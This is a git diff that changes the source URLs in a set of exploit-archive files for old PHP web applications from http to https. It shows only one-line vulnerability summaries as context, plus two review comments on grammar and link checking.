@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19624/info +source: https://www.securityfocus.com/bid/19624/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/28414.txt b/exploits/php/webapps/28414.txt index f146ef13f..26f262d8b 100644 --- a/exploits/php/webapps/28414.txt +++ b/exploits/php/webapps/28414.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19624/info +source: https://www.securityfocus.com/bid/19624/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/28415.txt b/exploits/php/webapps/28415.txt index ca1e9268d..6946473fb 100644 --- a/exploits/php/webapps/28415.txt +++ b/exploits/php/webapps/28415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19624/info +source: https://www.securityfocus.com/bid/19624/info cPanel is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/28416.txt b/exploits/php/webapps/28416.txt index bc113b2c7..e28a80a69 100644 --- a/exploits/php/webapps/28416.txt +++ b/exploits/php/webapps/28416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19625/info +source: https://www.securityfocus.com/bid/19625/info The Mambo EstateAgent component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28417.txt b/exploits/php/webapps/28417.txt index 51f5227f5..d84a2c2e3 100644 --- a/exploits/php/webapps/28417.txt +++ b/exploits/php/webapps/28417.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19626/info +source: https://www.securityfocus.com/bid/19626/info ToendaCMS is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28418.txt b/exploits/php/webapps/28418.txt index 595c76b6a..9a3e87d15 100644 --- a/exploits/php/webapps/28418.txt +++ b/exploits/php/webapps/28418.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19628/info +source: https://www.securityfocus.com/bid/19628/info Multiple remote file-include vulnerabilities affect the Content Management module for PHProjekt because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. diff --git a/exploits/php/webapps/28419.txt b/exploits/php/webapps/28419.txt index d7b718858..d83d18401 100644 --- a/exploits/php/webapps/28419.txt +++ b/exploits/php/webapps/28419.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19630/info +source: https://www.securityfocus.com/bid/19630/info Smart Traffic is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28422.txt b/exploits/php/webapps/28422.txt index ac897194a..ad56cbeff 100644 --- a/exploits/php/webapps/28422.txt +++ b/exploits/php/webapps/28422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19646/info +source: https://www.securityfocus.com/bid/19646/info Paid Mail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28423.txt b/exploits/php/webapps/28423.txt index 1c7953b69..bbbff71f0 100644 --- a/exploits/php/webapps/28423.txt +++ b/exploits/php/webapps/28423.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19658/info +source: https://www.securityfocus.com/bid/19658/info RedBLoG is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28426.txt b/exploits/php/webapps/28426.txt index 377434720..c689c173b 100644 --- a/exploits/php/webapps/28426.txt +++ b/exploits/php/webapps/28426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19663/info +source: https://www.securityfocus.com/bid/19663/info Multiple remote file-include vulnerabilities affect HPE because the application fails to properly sanitize user-supplied input before using it in a PHP 'include()' function call. diff --git a/exploits/php/webapps/28428.txt b/exploits/php/webapps/28428.txt index 792a02f7f..130d90bf7 100644 --- a/exploits/php/webapps/28428.txt +++ b/exploits/php/webapps/28428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19709/info +source: https://www.securityfocus.com/bid/19709/info Yapig is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may let an attacker steal cookie-based authentication credentials and launch other attacks. diff --git a/exploits/php/webapps/28429.js b/exploits/php/webapps/28429.js index ac44b0d83..f6e3d9e3b 100644 --- a/exploits/php/webapps/28429.js +++ b/exploits/php/webapps/28429.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19718/info +source: https://www.securityfocus.com/bid/19718/info MyBB is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28430.txt b/exploits/php/webapps/28430.txt index b00a7fd91..d08f36bca 100644 --- a/exploits/php/webapps/28430.txt +++ b/exploits/php/webapps/28430.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19721/info +source: https://www.securityfocus.com/bid/19721/info Jupiter CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28431.txt b/exploits/php/webapps/28431.txt index d1d8e2cb3..6e8ef9c0c 100644 --- a/exploits/php/webapps/28431.txt +++ b/exploits/php/webapps/28431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19722/info +source: https://www.securityfocus.com/bid/19722/info Jetbox CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28432.txt b/exploits/php/webapps/28432.txt index 1974709f4..3f7000b48 100644 --- a/exploits/php/webapps/28432.txt +++ b/exploits/php/webapps/28432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28433.txt b/exploits/php/webapps/28433.txt index 09ae4de8b..cfe3264bd 100644 --- a/exploits/php/webapps/28433.txt +++ b/exploits/php/webapps/28433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28434.txt b/exploits/php/webapps/28434.txt index 861620e97..7e50e1923 100644 --- a/exploits/php/webapps/28434.txt +++ b/exploits/php/webapps/28434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28435.txt b/exploits/php/webapps/28435.txt index addfadc23..35108794d 100644 --- a/exploits/php/webapps/28435.txt +++ b/exploits/php/webapps/28435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19723/info +source: https://www.securityfocus.com/bid/19723/info Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28436.txt b/exploits/php/webapps/28436.txt index 45fef193c..5bfc3b6ef 100644 --- a/exploits/php/webapps/28436.txt +++ b/exploits/php/webapps/28436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19724/info +source: https://www.securityfocus.com/bid/19724/info AlstraSoft Video Share Enterprise is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28437.txt b/exploits/php/webapps/28437.txt index a30519d5c..aa8e35548 100644 --- a/exploits/php/webapps/28437.txt +++ b/exploits/php/webapps/28437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19725/info +source: https://www.securityfocus.com/bid/19725/info The Mambo and Joomla com_comprofiler component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28439.txt b/exploits/php/webapps/28439.txt index 34ab8c184..1adb86936 100644 --- a/exploits/php/webapps/28439.txt +++ b/exploits/php/webapps/28439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19745/info +source: https://www.securityfocus.com/bid/19745/info HLstats is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28440.txt b/exploits/php/webapps/28440.txt index 99ede602c..64a230609 100644 --- a/exploits/php/webapps/28440.txt +++ b/exploits/php/webapps/28440.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19754/info +source: https://www.securityfocus.com/bid/19754/info ModuleBased CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28441.txt b/exploits/php/webapps/28441.txt index 78aa3ac4f..09a5164b2 100644 --- a/exploits/php/webapps/28441.txt +++ b/exploits/php/webapps/28441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19757/info +source: https://www.securityfocus.com/bid/19757/info IwebNegar is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28442.txt b/exploits/php/webapps/28442.txt index 36db58b68..cd3589cf1 100644 --- a/exploits/php/webapps/28442.txt +++ b/exploits/php/webapps/28442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19763/info +source: https://www.securityfocus.com/bid/19763/info LinksCaffe is prone to an authentication-bypass vulnerability because of a lack of required authentication on the application's administrative script. An attacker can use administrative functions simply by knowing the script's name and location. diff --git a/exploits/php/webapps/28444.txt b/exploits/php/webapps/28444.txt index 23d9c6dac..b14be609e 100644 --- a/exploits/php/webapps/28444.txt +++ b/exploits/php/webapps/28444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19769/info +source: https://www.securityfocus.com/bid/19769/info AlstraSoft Template Seller is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28446.txt b/exploits/php/webapps/28446.txt index 9e00dd859..edea6c772 100644 --- a/exploits/php/webapps/28446.txt +++ b/exploits/php/webapps/28446.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19771/info +source: https://www.securityfocus.com/bid/19771/info HLstats is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28447.php b/exploits/php/webapps/28447.php index f9535b688..b2711db4c 100644 --- a/exploits/php/webapps/28447.php +++ b/exploits/php/webapps/28447.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19774/info +source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28453.txt b/exploits/php/webapps/28453.txt index c7fd8395c..375df7b1e 100644 --- a/exploits/php/webapps/28453.txt +++ b/exploits/php/webapps/28453.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28454.txt b/exploits/php/webapps/28454.txt index 86c645d5a..5fba36f5d 100644 --- a/exploits/php/webapps/28454.txt +++ b/exploits/php/webapps/28454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28455.txt b/exploits/php/webapps/28455.txt index 8098e8960..e03bf5e1e 100644 --- a/exploits/php/webapps/28455.txt +++ b/exploits/php/webapps/28455.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28456.txt b/exploits/php/webapps/28456.txt index 7996b3061..3ad6530da 100644 --- a/exploits/php/webapps/28456.txt +++ b/exploits/php/webapps/28456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28457.txt b/exploits/php/webapps/28457.txt index 2c17aa03c..fb7122134 100644 --- a/exploits/php/webapps/28457.txt +++ b/exploits/php/webapps/28457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28458.txt b/exploits/php/webapps/28458.txt index ad95870aa..32fad2eed 100644 --- a/exploits/php/webapps/28458.txt +++ b/exploits/php/webapps/28458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28459.txt b/exploits/php/webapps/28459.txt index d6e0bf1d4..6f19ed25d 100644 --- a/exploits/php/webapps/28459.txt +++ b/exploits/php/webapps/28459.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28460.txt b/exploits/php/webapps/28460.txt index e2f75c5d8..c3860e4a1 100644 --- a/exploits/php/webapps/28460.txt +++ b/exploits/php/webapps/28460.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28461.txt b/exploits/php/webapps/28461.txt index f7b1a32fa..b2aeae591 100644 --- a/exploits/php/webapps/28461.txt +++ b/exploits/php/webapps/28461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28462.txt b/exploits/php/webapps/28462.txt index 22ae26aba..32f4d375c 100644 --- a/exploits/php/webapps/28462.txt +++ b/exploits/php/webapps/28462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28464.txt b/exploits/php/webapps/28464.txt index ba7507d78..3cc20f828 100644 --- a/exploits/php/webapps/28464.txt +++ b/exploits/php/webapps/28464.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19777/info +source: https://www.securityfocus.com/bid/19777/info ezContents is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28465.txt b/exploits/php/webapps/28465.txt index 058ded63b..ee765e736 100644 --- a/exploits/php/webapps/28465.txt +++ b/exploits/php/webapps/28465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19780/info +source: https://www.securityfocus.com/bid/19780/info ezContents is prone to a cross-site scripting vulnerability because it fails to sanitize input before displaying it to users of the application. diff --git a/exploits/php/webapps/28466.txt b/exploits/php/webapps/28466.txt index d87fe110a..fba9f91d5 100644 --- a/exploits/php/webapps/28466.txt +++ b/exploits/php/webapps/28466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19781/info +source: https://www.securityfocus.com/bid/19781/info Learn.com learncenter is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28467.txt b/exploits/php/webapps/28467.txt index 53337a9ca..fc0b694cd 100644 --- a/exploits/php/webapps/28467.txt +++ b/exploits/php/webapps/28467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19787/info +source: https://www.securityfocus.com/bid/19787/info ExBB is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28468.txt b/exploits/php/webapps/28468.txt index 7ae46db23..add566025 100644 --- a/exploits/php/webapps/28468.txt +++ b/exploits/php/webapps/28468.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19799/info +source: https://www.securityfocus.com/bid/19799/info YACS is prone multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28470.txt b/exploits/php/webapps/28470.txt index 02d5ba981..b9041e5d0 100644 --- a/exploits/php/webapps/28470.txt +++ b/exploits/php/webapps/28470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19803/info +source: https://www.securityfocus.com/bid/19803/info VBZooM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28471.txt b/exploits/php/webapps/28471.txt index 08a4f4084..3419331d1 100644 --- a/exploits/php/webapps/28471.txt +++ b/exploits/php/webapps/28471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19806/info +source: https://www.securityfocus.com/bid/19806/info ToendaCMS is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28472.txt b/exploits/php/webapps/28472.txt index 60337bc4c..2879eb2fa 100644 --- a/exploits/php/webapps/28472.txt +++ b/exploits/php/webapps/28472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19807/info +source: https://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28473.txt b/exploits/php/webapps/28473.txt index 4504238fb..3d0b65fda 100644 --- a/exploits/php/webapps/28473.txt +++ b/exploits/php/webapps/28473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19813/info +source: https://www.securityfocus.com/bid/19813/info Autentificator is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. 
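Review bot: several context lines in these hunks carry the same grammar slip: "is prone a remote file-include vulnerability" (28417.txt, 28419.txt, 28423.txt, 28471.txt) and "is prone multiple remote file-include vulnerabilities" (28403.txt, 28404.txt, 28468.txt). They sit outside the changed line, so they are rightly left out of a scheme-only commit, but a follow-up that inserts the missing "to" would be cheap while these files are open.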
diff --git a/exploits/php/webapps/28486.txt b/exploits/php/webapps/28486.txt index 68dfb6a58..c326353c6 100644 --- a/exploits/php/webapps/28486.txt +++ b/exploits/php/webapps/28486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19824/info +source: https://www.securityfocus.com/bid/19824/info In-portal In-link is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28487.txt b/exploits/php/webapps/28487.txt index fbc6efb74..9f8a3ea6c 100644 --- a/exploits/php/webapps/28487.txt +++ b/exploits/php/webapps/28487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19825/info +source: https://www.securityfocus.com/bid/19825/info PHP-Nuke MyHeadlines module is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28488.php b/exploits/php/webapps/28488.php index bd3120ee2..9db86fbe0 100644 --- a/exploits/php/webapps/28488.php +++ b/exploits/php/webapps/28488.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19840/info +source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28490.txt b/exploits/php/webapps/28490.txt index b8215ff90..595451a87 100644 --- a/exploits/php/webapps/28490.txt +++ b/exploits/php/webapps/28490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19847/info +source: https://www.securityfocus.com/bid/19847/info SoftBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28492.txt b/exploits/php/webapps/28492.txt index c97b28e1b..14921b7ee 100644 --- a/exploits/php/webapps/28492.txt +++ b/exploits/php/webapps/28492.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19880/info +source: https://www.securityfocus.com/bid/19880/info Uni-vert PhpLeague is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28493.txt b/exploits/php/webapps/28493.txt index 43bb32f57..9dd23df56 100644 --- a/exploits/php/webapps/28493.txt +++ b/exploits/php/webapps/28493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19890/info +source: https://www.securityfocus.com/bid/19890/info The Book Catalog module for PHP-Nuke is prone to a vulnerability that lets attackers upload arbitrary files. diff --git a/exploits/php/webapps/28494.txt b/exploits/php/webapps/28494.txt index 62b173225..f19dcd04c 100644 --- a/exploits/php/webapps/28494.txt +++ b/exploits/php/webapps/28494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19894/info +source: https://www.securityfocus.com/bid/19894/info AckerTodo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28495.txt b/exploits/php/webapps/28495.txt index 5a178abc6..b762ebe9f 100644 --- a/exploits/php/webapps/28495.txt +++ b/exploits/php/webapps/28495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19907/info +source: https://www.securityfocus.com/bid/19907/info Twiki is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28496.php b/exploits/php/webapps/28496.php index eafdc3131..2ee9edad0 100644 --- a/exploits/php/webapps/28496.php +++ b/exploits/php/webapps/28496.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19908/info +source: https://www.securityfocus.com/bid/19908/info PHP-Fusion is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. 
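Review bot: every hunk changes only line 1, and only the URL scheme from http:// to https://, but nothing in the patch records that the rewritten links were checked. Suggest the commit message state that the rewrite is mechanical and scheme-only, and whether a sample of the https://www.securityfocus.com/bid/<id>/info links was confirmed to resolve, so a later reader can tell a dead reference from a mistyped one.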
diff --git a/exploits/php/webapps/28497.txt b/exploits/php/webapps/28497.txt index 67dc6301d..172c57f3a 100644 --- a/exploits/php/webapps/28497.txt +++ b/exploits/php/webapps/28497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19916/info +source: https://www.securityfocus.com/bid/19916/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28498.txt b/exploits/php/webapps/28498.txt index bdc6952b8..00c2ac2c2 100644 --- a/exploits/php/webapps/28498.txt +++ b/exploits/php/webapps/28498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19916/info +source: https://www.securityfocus.com/bid/19916/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28499.txt b/exploits/php/webapps/28499.txt index 5c43010d5..ec1f044b7 100644 --- a/exploits/php/webapps/28499.txt +++ b/exploits/php/webapps/28499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19919/info +source: https://www.securityfocus.com/bid/19919/info Viking board is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28502.txt b/exploits/php/webapps/28502.txt index bf1dfe974..a3e6d63a0 100644 --- a/exploits/php/webapps/28502.txt +++ b/exploits/php/webapps/28502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19932/info +source: https://www.securityfocus.com/bid/19932/info TextAds is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28503.txt b/exploits/php/webapps/28503.txt index e50f5acbf..b9537a1ac 100644 --- a/exploits/php/webapps/28503.txt +++ b/exploits/php/webapps/28503.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19932/info +source: https://www.securityfocus.com/bid/19932/info TextAds is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28505.txt b/exploits/php/webapps/28505.txt index 057ab4b6e..a06ff06fd 100644 --- a/exploits/php/webapps/28505.txt +++ b/exploits/php/webapps/28505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19942/info +source: https://www.securityfocus.com/bid/19942/info PHProg is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These issues include a cross-site scripting vulnerability and a local file-include vulnerability. diff --git a/exploits/php/webapps/28509.txt b/exploits/php/webapps/28509.txt index b389e8de5..28ff26207 100644 --- a/exploits/php/webapps/28509.txt +++ b/exploits/php/webapps/28509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19948/info +source: https://www.securityfocus.com/bid/19948/info XHP CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28510.txt b/exploits/php/webapps/28510.txt index 5dea97ecd..1adec8376 100644 --- a/exploits/php/webapps/28510.txt +++ b/exploits/php/webapps/28510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19957/info +source: https://www.securityfocus.com/bid/19957/info PHProg is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and local file-include attacks. diff --git a/exploits/php/webapps/28511.txt b/exploits/php/webapps/28511.txt index 820946d70..af0dae495 100644 --- a/exploits/php/webapps/28511.txt +++ b/exploits/php/webapps/28511.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19957/info +source: https://www.securityfocus.com/bid/19957/info PHProg is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and local file-include attacks. diff --git a/exploits/php/webapps/28515.txt b/exploits/php/webapps/28515.txt index b9ed23c95..bcaa912d5 100644 --- a/exploits/php/webapps/28515.txt +++ b/exploits/php/webapps/28515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19963/info +source: https://www.securityfocus.com/bid/19963/info IDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user supplied data. diff --git a/exploits/php/webapps/28516.txt b/exploits/php/webapps/28516.txt index 8dfce1493..d5a152a8b 100644 --- a/exploits/php/webapps/28516.txt +++ b/exploits/php/webapps/28516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19963/info +source: https://www.securityfocus.com/bid/19963/info IDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user supplied data. diff --git a/exploits/php/webapps/28517.txt b/exploits/php/webapps/28517.txt index 2fbc9aee8..a2344fa4d 100644 --- a/exploits/php/webapps/28517.txt +++ b/exploits/php/webapps/28517.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19963/info +source: https://www.securityfocus.com/bid/19963/info IDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user supplied data. diff --git a/exploits/php/webapps/28518.txt b/exploits/php/webapps/28518.txt index bc2bfa5f7..ae2341087 100644 --- a/exploits/php/webapps/28518.txt +++ b/exploits/php/webapps/28518.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19964/info +source: https://www.securityfocus.com/bid/19964/info IDevSupport iSupport is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28519.txt b/exploits/php/webapps/28519.txt index 13acce2a6..d1092dd51 100644 --- a/exploits/php/webapps/28519.txt +++ b/exploits/php/webapps/28519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19968/info +source: https://www.securityfocus.com/bid/19968/info WM-News is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28520.txt b/exploits/php/webapps/28520.txt index 62940b820..37cf6fce6 100644 --- a/exploits/php/webapps/28520.txt +++ b/exploits/php/webapps/28520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19972/info +source: https://www.securityfocus.com/bid/19972/info Ractive Popper is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28522.txt b/exploits/php/webapps/28522.txt index 613b0c9c0..4f1dcb2f8 100644 --- a/exploits/php/webapps/28522.txt +++ b/exploits/php/webapps/28522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28523.txt b/exploits/php/webapps/28523.txt index d4c432214..e8cb9f6c1 100644 --- a/exploits/php/webapps/28523.txt +++ b/exploits/php/webapps/28523.txt 
